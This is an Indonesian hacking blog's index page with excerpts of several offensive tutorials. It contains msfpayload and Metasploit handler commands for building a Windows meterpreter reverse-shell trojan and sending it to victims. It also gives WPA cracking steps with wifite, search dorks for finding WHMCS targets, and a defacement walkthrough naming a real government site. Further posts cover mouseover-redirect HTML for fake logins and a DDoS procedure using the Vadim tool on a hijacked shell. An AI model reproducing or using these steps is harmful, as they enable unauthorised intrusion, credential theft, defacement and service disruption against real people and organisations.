Posts

Hack windows pada ip public (wan)

Image
kali ini kita coba mengekploitasi windows dari luar jaringan tidak lagi pada local area (LAN) oke langsung saja ya pentest nya ingat kita harus memforward ip kita di router / modem rubah portnya menjadi 4444 ya dan ip localnya diisi dengan ip local kamu disini ip local ane 192.168.1.74 sekarang buat payloadnya buka terminal ketikkan perintah msfpayload windows/meterpreter/reverse_tcp LHOST= 125.164.216.221 LPORT=4444 x > Desktop/trojanzboy.exe rubah lhost diatas dengan ip public kalian untuk melihat ip public bisa cek di http://www.whatismyip.com/ lalu buka metasploit di terminal dengan mengetikkan msfconsole setelah itu ketikkan perintah exploitnya use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 125.164.216.221 (ip public kalian) set lport 4444 exploit kirimkan payload yang telah kita buat tadi dan tunggu hingga korban mengeksekusi payload yang kita buat tadi alhasil session pertama telah terbuka dan berhasil kita sudah mendapatkan session sekarang...

hack password hotspot dengan wifite

Image
Ok tutor kali ini menjelaskan tentang hack wep / wpa bukan wpa2 loh ya.. dengan cara automatis dengan menggunakan wifite.py dulu pernah saya menulis tentang hack hotspot dengan aircrack tapi sekarang kita coba dengan tool baru ok disini saya menggunakan backtrack 5 r3 yang programnya sudah ada pada /pentest/wireless/wifite 1. buka di menu backtrack > exploitation tools > wireles exploitation tool > wlan exploitation > wifite 2. ketikkan perintah ./wifite.py lalu tunggu hingga muncul korban hotspot yang akan kita serang ketika sudah menentukan korban tekan ctrl+c untuk menghentikan scanning hmm . . . kalau sudah ctrl + c sekarang menentukan target disini target saya ada pada nomer 1 maka saya ketik di terminal no 1 disini kita bisa menyerang semua hotspot yang sudah di scanning dengan menentukan nomer yang tersedia disertai dengan tanda , berhubung disini saya cuman nyerang 1 target saja sekarang tunggu hingga proses selesai secara otomatis dan berhasil pasword telah di te...

Tutorial lengkap hack whmcs

Image
  WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak kalangan webhoster karena dengan memanage yang mudah. WHMCS juga adalah sebuah billing yang berfungsi untuk pembuatan account hosting,reseller,vps maupun dedicated. WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa dikatakan billing nomor 1, WHMCS melebihi billing2 yang lain seperti ModernBill,AcountLab ++ dan lainnya. fitur WHMCS juga boleh dikatakan hampir komplit untuk urusan memanaged hosting, anda akan di manjakan dengan BILLING WHMCS ini .. Pertama Yg Kita Butuhkan Adalah Dork inilah dia Dork intext:Powered by WHMCompleteSolution inurl:submitticket.php intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php intext:Powered by WHMCompleteSolution inurl:client/submitticket.php intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php intext:Powered by WHMCompleteSolution inurl:crm/submitticket....

Tutorial lengkap deface website

Image
Apa itu deface? Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja server lambat dan lama-kelamaan server akan crash dan down. Itulah deface. ok langsung saja peralatan perang yang dibutuhkan 1.acunetix --> download 2.havij pro --> download 3.admin login finder --> download 4.shell backdoor -->  download 1.scanning web korban dengan acunetix disini korban saya http://www.vsi.esdm.go.id maaf ya adamin cuman buat pembelajaran scanning sampai selesai setelah itu muncul hole atau kerentanan web tersebut hmmm sepertinya disisni saya akan mengeksekusi web tersebut dengan teknik s...

Tehnik Manipulasi URL

Image
Pada kesempatan kali ini saya sedikit membahas tentang beberapa langkah sederhana bagaimana kita melakukan tehnik manipulasi URL yang tujuannya macam-macam Entah untuk melakukan Social Engineering seperti membuat Fake Login atau sejenisnya (exp: Manipulasi Adsenseoke langsung aja Tehnik Pertama (Manipulasi Pada Script) Langkah awal yang harus kita lakukan adalah dengan membuat file (contoh) index.php yang isinya sebagai berikut <html> <body> <div id="open" onmouseover="document.location='http://cruzenaldo.com';" style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('open').style.left=mouseX-2; document.getElementById('open').style.top=mouseY-2; } </script> <center> <br> <br> <a href="http://facebook....

Ddos menggunakan vadim pada shell

Image
Pahami dulu arti'y, Serangan DOS. Silahkan dibaca dulu pengertian'y --> http://id.wikipedia.org/wiki/Serangan_DoS Step yang dilakukan dalam melakukan serangan Ddos: 1. Connect ke korban (host, port). 2. Kirimkan paket data dalam jumlah besar. 3. koneksi terputus > selesai. Sebenar'y masih banyak tekhnik DDOS ATTACK. tapi Yang akan ane bahas disini adalah Ddos dengan menggunakan shell dengan VADIM Sebagai senjata untuk menyerang. Langkah Pertama : Download file Vadim : https://dl.dropboxusercontent.com/s/lbsg33g6biotcl2/vadim%28trojanzboy.blogspot.com%29.tar.gz?token_hash=AAH2eADr9GPvED0b_fQYmEoFdo3MFNfWbzmQkx2qM2MGJg&dl=1  Langkah Kedua : Upload Vadim yg dagh di donlot tadi ke Shell kalian. Kalo belum punya shell. silahkan minta ke temen. Shell hrs dlm keadaan safemode Off , chmod'y permissionnya disetting 777 artinya kita mampu melakukan aksi baca, tulis dan eksekusi terhadap file tersebut. Langkah Ketiga : Ekstrak file Vadim menggunakan perintah --> ta...

Cara Mengetahui Email ID palsu atau asli

Image
Cara mengetahui id Email Palsu sangat penting untuk mengetahui / mendeteksi ID Email palsu karena hacker (baca : interuder ) biasanya menggunakan ID Email palsu untuk mendapatkan informasi pribadi korban. Ada beberapa teknik untuk mengidentifikasi ID Email palsu seperti, 1. Kirim test mail ke ID tersebut. 2. Email Checker Alamat. 1. Alamat Email Checker. http://tools.email-checker.com/    berikut contoh screenshotnya: Semoga Bermanfaat